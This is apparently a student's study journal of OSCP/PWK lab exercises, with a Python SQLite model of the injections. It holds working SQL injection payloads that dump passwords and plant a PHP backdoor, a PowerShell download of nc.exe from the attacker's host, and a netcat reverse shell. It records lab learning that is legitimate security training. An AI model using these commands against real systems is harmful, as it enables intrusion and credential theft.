"If I had 6 hours to chop down a tree, I'd spend the first 4 sharpening the axe!" :Abraham Lincoln
"Never...Never trust the interwebz!!!" -Julius Caesar
HTB writeups of Legacy machines.
7/2/19 - Grrrr, let's get this SQLi sewn up! Bit frustrating yesterday, playing with this SQLi in the search.php page... it's in the lang function, and the query should be dealt with via a web proxy, but since the required Tamper Data is now pants, I've got to use Burp instead. It is a partially blind SQLi, with a bit of an oracle telling you when the query doesn't match the correct syntax... I think part of the problem I had yesterday... Oh My Gosh!!! that was a bit of a bind... It seems like we need to limit output on here to 1 line of output, or it will not show... With the necessary command added to the query, I can continue with the UNION ALL SELECT enumeration of the db. @@version and user() both now work.... yipee!

q=foo&lang=en' union all select 1,2,3,4,user(),6 LIMIT 1; (%23 missing here)

now to add cmd...

q=foo&lang=en' union all select 1,2,3,4,"",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'

.....by my server!!!
http://10.11.15.119/backdoor.php?cmd=dir
...the rest is easy peasy, just like the last exercise... ....Done! Finally!
6/2/19 - SQLi continued... web application proxies...

13.5.1 - Exercises...
1. Use Tamper Data to cause SQLi on the lang parameter
2. Identify how far you can push this vuln. Can you obtain a full shell?

I started this late last night, and after hitting a few hurdles (see below) I decided to start again afresh today... Tamper Data (at least the new version) will not allow the user to edit POST form data. Having looked at the forums, and asked on IRC #offsec and got no definitive response, I'm going to use Burp Suite (free version) instead to achieve the same ends. The pedant in me wants Offsec to update their course materials... but it's actually fitting that I have to get around the problem myself.... provided that it is actually acceptable to Offsec that I use Burp and not a browser-based proxy... I would have used OWASP Mantra but that is deprecated and no longer available.
# 13.4.2 - Enumerating the Database... started doing this last night.....

# 13.4.3 Column Number Enumeration...
first append ?id= to the URL and add a random number, then add ' or " to the end of the number to get an error message, to see how verbose it will be.
use 'order by' to get the number of columns... e.g.
http://10.11.15.119/comment.php?id=738 order by 1
then increase the order by number until it breaks... exceeds the no. of columns. Now we know the table has 6 columns, because it breaks at 7. And we know that the page is using the table 'guestbook'....

# UNION ALL SELECT....
http://10.11.15.119/comment.php?id=738 union all select 1,2,3,4,5,6
(I actually used id=555... but same results... coz it's the id of the comment, dummy!)
My results table is empty because guestbook is empty... let's populate it... OK, now I realize that in the course material they used 738 because that's the comment number they had... when I populated the table of comments I could see that my comments had ids... I now used id=912.... following well again!

# 13.4.5 - Extracting Data from the Database.
# to discover the version of mysql in use... use column 5 for output, coz the field is not just numeric.
http://10.11.15.119/comment.php?id=912 union all select 1,2,3,4,@@version,6
answer = 5.1.30-community
~~~
# to discover the current user being used for the db connection
http://10.11.15.119/comment.php?id=912 union all select 1,2,3,4,user(),6
answer = root@localhost !!!
~~~
# enumerate db tables and column structures using 'information_schema'
http://10.11.15.119/comment.php?id=912 union all select 1,2,3,4,table_name,6 FROM information_schema.tables
output = list of table names... BLIMEY!!! now we can target specific tables... instead of just dumping the whole lot! 'users' and 'user_pwd' look handy!
~~~~
# extract name and password values from the users table
http://10.11.15.119/comment.php?id=912 union select 1,2,3,4,concat(name,0x3a,password),6 FROM users
0x3a = : ... so username and password are separated
output =
offsec:123456
secret:password
backup:backup12
................. shit the bed!!!

# 13.4.5.1 Exercises
1. Enumerate the structure of the db using SQLi... done
2. Understand how and why you can pull data from injected commands and have it displayed on the screen.... I do now...
3. Extract all users and passwords from db.... done.

###########################
# 13.4.6 - Leveraging SQL Injection for Code Execution
now we can read/write files on the underlying computer system... our target is windows... so easier than linux, which restricts privs to this sort of thing...
http://10.11.15.119/comment.php?id=912 union all select 1,2,3,4,load_file('c:/windows/system32/drivers/etc/hosts'),6
output = contents of /etc/hosts
~
# next use the 'INTO OUTFILE' function to create a malicious PHP file in the
# server's web root:
http://10.11.15.119/comment.php?id=912 union all select 1,2,3,4,"",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
...shit just got real!
output = we get a warning.... but it works... browsing to c:/xampp/htdocs we can see backdoor.php right there!!!

# Exercise
1. Exploit SQL injection along with the mysql 'INTO OUTFILE' function to obtain code execution... done
2. Get a shell...

###############
# we can access this backdoor file to execute commands... like ipconfig
10.11.15.119/backdoor.php?cmd=ipconfig
# try dis...
php -r '$sock=fsockopen("10.11.0.172",12345);exec("cmd");'
fails... probably not structured correctly... but now I can use the cmd backdoor to upload nc.exe as before...
...straight use of wget fails, so use the powershell wget again instead, echoing the contents of the .ps1 file to the folder....
###########
echo $storageDir = $pwd >wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.11.0.172/nc.exe" >>wget.ps1
echo $file = "foobar.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
# then run....
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
## then rename foobar.exe to nc.exe (nc.exe is blocked by firewall)
ren foobar.exe nc.exe
# set listener on kali machine
nc -nlvp 12345
# then run...
nc 10.11.0.172 12345 -e cmd
#########
### SUCCESS #### we have shell!
~~~~~~~~~~~~
yesterday I did an exercise in pwk labs...
13.2.1 Browser Redirection and IFRAME Injection
13.2.2 Stealing Cookies and Session Information
13.2.3 ...Exercises
my win7 machine has an apache server and runs a basic webpage with a guestbook and admin area. used xss to steal cookies and gain admin access, bypassing auth.
13.3.1 Local File Inclusion
13.3.1.1 Contaminating Log Files
13.3.1.2 From LFI to Code Execution
13.3.1.3 ...Exercises
used lfi to inject cmd into the apache logs, then read the logs as the response to cmds inputted to the url &cmd=. echoed lines of code to a powershell script... then executed it to get files served by my port 80.... including a renamed (because of firewall block) nc.exe. renamed nc.exe once inserted, and executed a reverse cmd shell. ....it'll be easy they said....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Today I'm going to do...
13.3.2 Remote File Inclusion
....similar to what I did yesterday... host the file on my port 80 apache server, and instead of file traversal, use the same vulnerable LANG= parameter to point to my file.
...make evil.txt... containing php code...
....cp to /var/www/html/ and execute the above.
...
13.3.2.1 Exercise... Exploit the RFI vulnerability in the web application and get your shell.
.........will come back to this, as it's pretty much the same as yesterday... and I want to move on to sqli...
#################################
13.4 MySQL SQL Injection... using the win7 mysql server... see how queries are structured.... then abuse....
bypass auth with...
jeff' or 1=1 LIMIT 1;#
# which amounts to...
select * from users where name='jeff' or 1=1 LIMIT 1;#
# no need to go further as the hash # makes the server ignore everything else...
# like the null byte %00 for urls.
~~~~~~~~~
13.4.1.1 ...Exercises
1. Interact with the MySQL db and manually execute the commands as the web server does as part of the authentication process. Understand the vulnerability.
2. Utilize SQL injection to bypass the login process.
3. Understand why the username is reported like it is once the authentication process is bypassed.
~~~~~~~~~done...
13.4.2 Enumerating the database...
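The three SQLi steps on this page, the login bypass with jeff' or 1=1 LIMIT 1;#, the ORDER BY / UNION ALL SELECT enumeration against comment.php, and the "only one line shows" problem on search.php from the 7/2/19 entry, modelled offline as an added example (my code, not the course's and not the page's). It uses an in-memory SQLite database standing in for the lab's MySQL server, so the guestbook/users table and column names are assumptions, SQLite's `--` comment is used where MySQL accepts `#`, name||':'||password replaces concat(name,0x3a,password), and sqlite_version() stands in for @@version. The query-builder functions concatenate input the way the vulnerable pages do, which is the whole bug.

```python
import sqlite3
from urllib.parse import quote


def make_db():
    """Constructed stand-in for the lab's MySQL guestbook database (SQLite in
    memory; table/column names are assumptions, the users rows are the ones
    the page extracted)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE guestbook(id INTEGER, name TEXT, email TEXT,
                               website TEXT, comment TEXT, posted TEXT);
        INSERT INTO guestbook VALUES (912,'me','me@example.com','','hi','2019-02-05');
        CREATE TABLE users(id INTEGER, name TEXT, password TEXT);
        INSERT INTO users VALUES (1,'offsec','123456'),
                                 (2,'secret','password'),
                                 (3,'backup','backup12');
    """)
    return db


# The vulnerable query builders: input is concatenated straight into SQL.
def login_query(user, pw):
    return f"SELECT name FROM users WHERE name='{user}' AND password='{pw}'"


def comment_query(id_param):
    # id is numeric, so there is no quote to close before injecting
    return ("SELECT id,name,email,website,comment,posted "
            f"FROM guestbook WHERE id={id_param}")


def search_query(term):
    return ("SELECT id,name,email,website,comment,posted "
            f"FROM guestbook WHERE comment='{term}'")


def login(db, user, pw):
    """Name the app greets after login, or None. "x' or 1=1 LIMIT 1" matches
    every row and keeps the first, so the app reports the first user in the
    table (offsec), not the name that was typed in."""
    row = db.execute(login_query(user, pw)).fetchone()
    return row[0] if row else None


def count_columns(db, base_id, limit=20):
    """ORDER BY n succeeds until n exceeds the column count, then errors."""
    for n in range(1, limit + 1):
        try:
            db.execute(comment_query(f"{base_id} ORDER BY {n}")).fetchall()
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_extract(db, base_id, expr, table=None):
    """UNION ALL SELECT with a marker in every column; expr goes in column 5,
    a text column the page renders (a string in a numeric column would not)."""
    src = f" FROM {table}" if table else ""
    q = comment_query(f"{base_id} UNION ALL SELECT 1,2,3,4,{expr},6{src}")
    # injected rows carry the marker 1 in column 1; the genuine comment does not
    return [r[4] for r in db.execute(q).fetchall() if r[0] == 1]


def first_row_page(db, term):
    """Model of search.php, which renders only the first row returned. With
    LIMIT 1 the injected row is shown only when the original WHERE matches
    nothing, hence q=foo in the page's payload."""
    row = db.execute(search_query(term)).fetchone()
    return row[4] if row else None


def get_param(value):
    """Percent-encode a GET value. A literal '#' is a URL fragment and never
    reaches the server, so the MySQL comment must travel as %23."""
    return quote(value, safe="")


if __name__ == "__main__":
    db = make_db()
    print(login(db, "jeff' or 1=1 LIMIT 1 -- ", "x"))      # offsec
    print(count_columns(db, 912))                          # 6
    print(union_extract(db, 912, "sqlite_version()"))      # stands in for @@version
    print(union_extract(db, 912, "name||':'||password", "users"))
    print(first_row_page(db, "hi' UNION ALL SELECT 1,2,3,4,'injected',6 LIMIT 1 -- "))
    print(first_row_page(db, "foo' UNION ALL SELECT 1,2,3,4,'injected',6 LIMIT 1 -- "))
    print(get_param("en' union all select 1,2,3,4,user(),6 LIMIT 1;#"))
```

Run it as a script to see each step; swap SQLite's `--` for `#` (sent as %23) and `||` for concat() when aiming the same payloads at the lab's MySQL.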
Spent the morning in my nicely cleared (almost) office, with my linux mint pc to update/upgrade; it's been idle for many months. At the same time I had a Lenovo C-series to upgrade the ram on, and clean up for one client; and also sort out a dirty acer laptop... very dirty, for another. My 2pm tutorial client called to reschedule for next week, so that's given me some time to start this.... pick up kids at 3pm!!!

Progress report on Hacker101-CTF.... I'm currently on 'cody's blog', got the 'gallery' on half too. I've had 3 private invitations, turned them all down so far, but I think I'll accept the next one - providing it's not immoral! I'll start looking at live public projects in the near future, just want to gauge how much time this oscp course is going to take up. ...to be continued.